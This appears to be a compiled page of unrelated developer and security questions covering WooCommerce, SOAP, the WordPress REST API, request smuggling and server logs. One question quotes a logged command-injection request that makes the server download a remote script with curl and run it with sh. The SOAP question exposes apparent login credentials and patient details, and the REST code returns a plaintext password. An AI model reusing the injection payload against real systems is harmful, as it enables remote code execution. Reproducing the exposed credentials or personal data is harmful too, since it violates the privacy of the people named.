Trying to run a add_action within a function to run a woocomerce function on a ajax request

I am able to get a ajax request to work properly on a woocommerce checkout form page, now I want to update the price of the checkout in that ajax request. My add_action is in the function that is fired by the ajax request.

This is all done in a custom plugin as well

Here is my code this far, it doesn’t seem like the function request_gift_card ever fires

 function gift_card_redeem(){      if(!empty($  _SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($  _SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') {     error_log("test !empty");          add_action( 'woocommerce_before_calculate_totals', 'request_gift_card', 99 );      function request_gift_card($  cart_object){       if( !WC()->session->__isset( "reload_checkout" )) {           /* Gift wrap price */           $  additionalPrice = 5;           error_log($  cart_object);           foreach ( $  cart_object->cart_contents as $  key => $  value ) {               if( isset( $  value["embossing_fee"] ) ) {                   // Turn $  value['data']->price in to $  value['data']->get_price()                   $  orgPrice = floatval( $  value['data']->get_price() );                   $  discPrice = $  orgPrice + $  additionalPrice;                   $  value['data']->set_price($  discPrice);               }           }       }     }      $  result['type'] = "success";     $  result = json_encode($  result);     echo $  result;   }   else {     error_log("test else");       header("Location: ".$  _SERVER["HTTP_REFERER"]);   }    die(); } 

what wrong am i doing with SOAP request, getting error invalid timeout formats [closed]

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><SecurityHeader xmlns="http://services.medconnect.net/submissionportal"><UserName>2143883</UserName><Password><![CDATA[I3zt!7&W]]></Password></SecurityHeader></soap:Header><soap:Body><SubmitSync xmlns="http://services.medconnect.net/submissionportal"><request><![CDATA[ISA*00*          *00*          *ZZ*EXPEDIUM       *30*204202692      *200904*0419*^*00501*007281118*0*P*:~GS*HS*EXPEDIUM*204202692*20200904*0419*7281119*X*005010X279A1~ST*270*007281120*005010X279A1~BHT*0022*13*7281120*20200904*0419~HL*1**20*1~NM1*PR*2*BCBS OF NORTH CAROLINA*****PI*10383~HL*2*1*21*1~NM1*1P*2*BEAUFORT COUNTY HEALTH DEPARTMENT*****XX*1679576763~REF*TJ*566001521~PRV*PE*PXC*261QP0905X~HL*3*2*22*0~TRN*1*1013076869*9919649646~NM1*IL*1*BROWN*JEAN*M***MI*KBOW1747326401~REF*SY*141117752~DMG*D8*19650504*F~DTP*291*D8*20200904~EQ*30~SE*16*007281120~GE*1*7281119~IEA*1*007281118]]></request><requestFormat>EDI</requestFormat><responseFormat>EDI</responseFormat><synchronousTimeout>00:01:00</synchronousTimeout><submissionTimeout>00:01:00</submissionTimeout></SubmitSync></soap:Body></soap:Envelope>  Response ----------- <faultstring>Invalid Timeout Format: , Valid Format: d.hh:mm:ss, Note: Hours &lt;= 23, Minutes &lt;= 59, Seconds &lt;= 59</faultstring>  please advise on this 

No route was found matching the URL and request method. I don’t understand where the problem is

When I send parameters, I get this: No route was found matching the URL and request method.

/**   * Add json data on plugin.  *   * */ add_action('rest_api_init', 'register_api_hooks'); function register_api_hooks() {   register_rest_route(     'passwordless_register/v0', '/register/(?P<name>[a-zA-Z0-9-]+)/(?P<email>[a-zA-Z0-9-]+)/?aam-jwt=(?P<token>[a-zA-Z0-9-]+)',     array(       'methods'  => 'POST',       'callback' => 'wc_rest_user_endpoint_handler',     )   ); }  /**  * Register a new user  *  * @param  WP_REST_Request $  request Full details about the request.  * @return array $  args.  **/ function wc_rest_user_endpoint_handler($  request) {   $  request = new WP_REST_Request( 'POST', 'passwordless_register/v0/register/(?P<name>[a-zA-Z0-9-]+)/(?P<email>[a-zA-Z0-9-]+)/?aam-jwt=(?P<token>[a-zA-Z0-9-]+)' );   $  username = $  request['name'];   $  email = $  request['email'];   $  response = array();   $  error = new WP_Error();   if (empty($  username)) {     $  error->add(400, __("name field 'username' is required.", 'wp-rest-user'), array('status' => 400));     return $  error;   }   if (empty($  email)) {     $  error->add(401, __("Email field 'email' is required.", 'wp-rest-user'), array('status' => 400));     return $  error;   }   $  user_id = username_exists($  username);   if (!$  user_id && email_exists($  email) == false) {       $  password = wp_generate_password( 20, false );     $  user_id = wp_create_user($  username, $  password, $  email);     if (!is_wp_error($  user_id)) {       // Ger User Meta Data (Sensitive, Password included. DO NOT pass to front end.)       $  user = get_user_by('id', $  user_id);       // $  user->set_role($  role);       $  user->set_role('subscriber');       // WooCommerce specific code       if (class_exists('WooCommerce')) {         $  user->set_role('customer');       }       // Ger User Data (Non-Sensitive, Pass to front end.)       wp_nonce_field( 'wpa_passwordless_login_request', 'nonce', false );       $  unique_url = wpa_generate_url( $  email , $  nonce );       $  response['code'] = 200;       $  response['message'] = __("User '" . $  username . "' Registration was Successful", "wp-rest-user");       $  response['mail'] = __("Mail '" . $  email . "' Registration was Successful", "wp-rest-email");       $  response['password'] =  __("Pass '" . $  password . "' Registration was Successful", "wp-rest-pass");       $  response['url'] =  __("Link '" . $  unique_url . "' Registration was Successful", "wp-rest-url");     } else {       return $  user_id;     }   } else {     $  error->add(406, __("Email already exists, please try 'Reset Password'", 'wp-rest-user'), array('status' => 400));     return $  error;   }   return new WP_REST_Response($  response, 123);           } add_action( 'after_setup_theme', 'passwordless_register/v0' ); 

HTTP Request Smuggling Basics

I am currently trying to learn HTTP Request Smuggling vulnerability to furthermore enhance my pen testing skill. I have watched a couple of videos on Youtube and read articles online regarding it but still have a couple of questions in mind. Question:

  • What are the attack vectors of HTTP Req Smuggling (Where should I look)?
  • What is the main way to provide PoC to companies with high traffic? I know that HTTP Smuggling could possibly steal people’s cookie, can this be used for the PoC or is this illegal?
  • Can this or other vulnerability be chained together? (e.g. self-xss & csrf)

Thank you everyone!

Information exposure through query strings in url of a POST request [duplicate]

I can’t seem to find any information online for when there is information exposure through query strings in URL of a POST request.

I understand it is an issue for when it’s sent in HTTP GET. Wondering if it would still be an issue for when it’s sent in POST?

e.g.

POST /api/view?username=USER 

Weird GET request on internet facing Nginx

I spun up an internet facing nginx server in AWS and the logs started showing weird get requests with a search engine’s spider as user agent.

172.31.43.193 - - [19/Aug/2020:20:09:19 +0000] "GET /rexcategory?categoryCodes=SHPCAT33&t=1360657001168 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159"  2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/eyloyrewards/category" failed (2: No such file or directory), client: 172.31.43.193, server: localhost, request: "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1", host: "www.rewards.etihadguest.com"  172.31.43.193 - - [19/Aug/2020:20:08:39 +0000] "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "49.7.20.159" 

The domain mentioned in the second line does not belong to me. What is the meaning of these logs? Is my server being used to attack the mentioned domain, "www.rewards.etihadguest.com" ?

I am seeing ICMP type 3 error message from my firewall logs. However , I am unable to find the original request sent to that external IP [closed]

No matching connection for ICMP error message: icmp src inside: X.X.X.98 dst outside: X.X.X.11 (type 3, code 2) on inside interface. Original IP payload: udp src X.X.X.11/53 dst X.X.X.98/52906.

Can somebody please help me understand the cause.

Transformation of an object into parameter value on submission of request

Today I saw rather a weird phenomeon, when submitting a request spontaneoulsy.

The URL I typed looked something like below:

https://example.com/en/trade/pro?layout= and when submitted it transformed into https://example.com/en/trade?layout=pro

If I correctly perceived that the pro object moved to a value of layout (if not just visually).

It didn’t work for https://example.com/en/trade/test?layout= and when submitted should transform into https://example.com/en/trade?layout=test, that didn’t work.

It did only work for the pro object.

Is this a behavior made by developers of the site or could this eventually lead to something interesting?

Very Strange Access Request to my website

Recently I got a very odd request to my website. This is from the log file:

20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 

It appears to be trying to run some shell commands, including what I believe to be downloading the source of a site with cURL. I tried to visit this URL but it was blocked by my security filter. What is kerbynet? Is this part of cloudflare and can it be used to run shell commands on my website?

It should be noted that I use Cloudflare.

What is the term for data leaking from one HTTP request to another and how to prevent it?


Context

We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.

Although it is well-known that web application should be stateless, the long dependency graph of such application makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between request to avoid cold starts.

Questions

  1. What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.

  2. Are there tools and method to test for such mistakes or detect them in production?